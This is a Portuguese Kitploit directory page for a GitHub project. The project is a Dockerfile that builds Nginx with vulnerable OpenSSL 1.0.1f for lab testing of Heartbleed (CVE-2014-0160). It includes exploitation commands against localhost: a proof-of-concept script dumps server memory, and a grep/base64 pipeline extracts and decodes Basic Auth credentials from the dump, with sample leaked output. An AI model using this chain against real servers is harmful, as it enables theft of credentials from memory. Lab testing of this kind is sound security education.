Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Heartbleed_Dockerfile_with_Nginx — Dockerfile para testar a exploração do CVE-2014-0160 Heartbleed. | Kitploit
Ferramentas/GitHubGitHub/froyo75/heartbleed_dockerfile_with_nginx
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubfroyo75/heartbleed_dockerfile_with_nginx

Heartbleed_Dockerfile_with_Nginx

Dockerfile para testar a exploração do CVE-2014-0160 Heartbleed.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
11há 5 anosAinda não revisado

Testando Heartbleed com Dockerfile do Nginx

Este repositório contém o Dockerfile do Nginx com a versão vulnerável OpenSSL (1.0.1f) para testar a vulnerabilidade CVE-2014-0160 Heartbleed.

Imagem Base Docker

  • debian:latest

Instalação

  1. Instale o Docker

    • Exemplo com Debian: apt-get install -y docker
  2. Baixe do Docker Hub Registry público a imagem base debian: docker pull debian:latest

  3. Construa a imagem a partir do Dockerfile: docker build -t heartbleed_nginx_img .

Uso

Iniciar o container Heartbleed+Nginx

docker run -i -t -p 1500:443 heartbleed_nginx_img

Testando a Vulnerabilidade Heartbleed (CVE-2014-0160) com o método de Autenticação Básica HTTP
  1. Baixe o script Python Heartbleed-poc (Apenas para fins de teste!). Esta é uma versão modificada originalmente por Jared Stafford [email protected]. Agradecimentos ao SensePost por este.

  2. Abra duas novas abas no seu terminal atual e execute:

    • Primeira Aba (Gerando x100 requisições GET usando HTTP Basic Auth com o comando curl):

      for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done

      HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK snipp...

    • Segunda Aba (Gerando x100 requisições Heartbeats(-n 100) e escrevendo o dump de memória no arquivo "dump.bin", depois extraindo o resultado do campo "Authorization" do dump de memória e finalmente decodificando a string Base64 resultante em texto simples ^^):

      python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo

      WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! snipp... admin:myP@ssword0MG

Baixar ferramenta